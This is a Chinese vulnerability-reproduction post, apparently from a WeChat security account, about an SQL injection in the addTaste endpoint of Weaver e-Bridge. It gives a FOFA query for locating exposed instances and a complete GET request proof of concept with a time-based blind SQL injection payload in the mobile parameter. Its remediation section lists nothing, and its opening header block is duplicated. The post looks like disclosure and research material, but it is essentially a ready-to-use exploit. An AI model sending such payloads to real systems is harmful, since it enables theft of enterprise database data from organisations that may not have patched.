免责声明:该文章仅用于技术讨论与学习。请勿利用文章所提供的相关技术从事非法测试,若利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果均与文章作者及本账号无关。
漏洞名称
泛微云桥 e-Bridge addTaste接口SQL注入漏洞
漏洞评分
7.5(高危)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C :L/I:L/A:L/E:P/RL:X/RC:R
漏洞详情
e-Bridge 提供了一套全面的办公自动化工具,包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。它的核心理念是将企业内部的各种业务流程数字化,并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该系统 addTaste接口存在SQL注入漏洞,通过此漏洞攻击者可获取企业数据库敏感数据。
影响产品
泛微云桥
漏洞复现
fofa:app="泛微-云桥e-Bridge"
1.系统登录页面:
漏洞名称
泛微云桥 e-Bridge addTaste接口SQL注入漏洞
漏洞评分
7.5(高危)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C :L/I:L/A:L/E:P/RL:X/RC:R
漏洞详情
e-Bridge 提供了一套全面的办公自动化工具,包括文档管理、流程管理、协同办公、知识管理、移动办公等功能。它的核心理念是将企业内部的各种业务流程数字化,并通过云端技术实现跨部门、跨地域的协同办公和信息共享。该系统 addTaste接口存在SQL注入漏洞,通过此漏洞攻击者可获取企业数据库敏感数据。
影响产品
泛微云桥
漏洞复现
fofa:app="泛微-云桥e-Bridge"
1.系统登录页面:
2.漏洞路径
Poc:
GET/taste/addTaste?company=
1
&userName=
1
&openid=
1
&source=
1
&mobile=
1
%27%20AND%20(SELECT%208094%20FROM%20(SELECT(SLEEP(
5
-(IF(
18015
%3e3469,
0
,
4
)))))mKjk)%20OR%20%27KQZm%27=%27REcX HTTP/
1.1
Host:
User-Agent: Mozilla/
5.0
(Windows NT
10.0
; WOW64) AppleWebKit/
537.36
(KHTML, like Gecko)
Chrome/
71.0
.
3578.98
Safari/
537.36
Accept: *
/*
Accept-Encoding: gzip
SL-CE-SUID: 25
修复建议
补丁文件
暂无
其他修复方法
暂无
缓解方案
暂无
原文始发于微信公众号(蚁剑安全实验室):【漏洞复现】泛微云桥 e-Bridge addTaste接口SQL注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论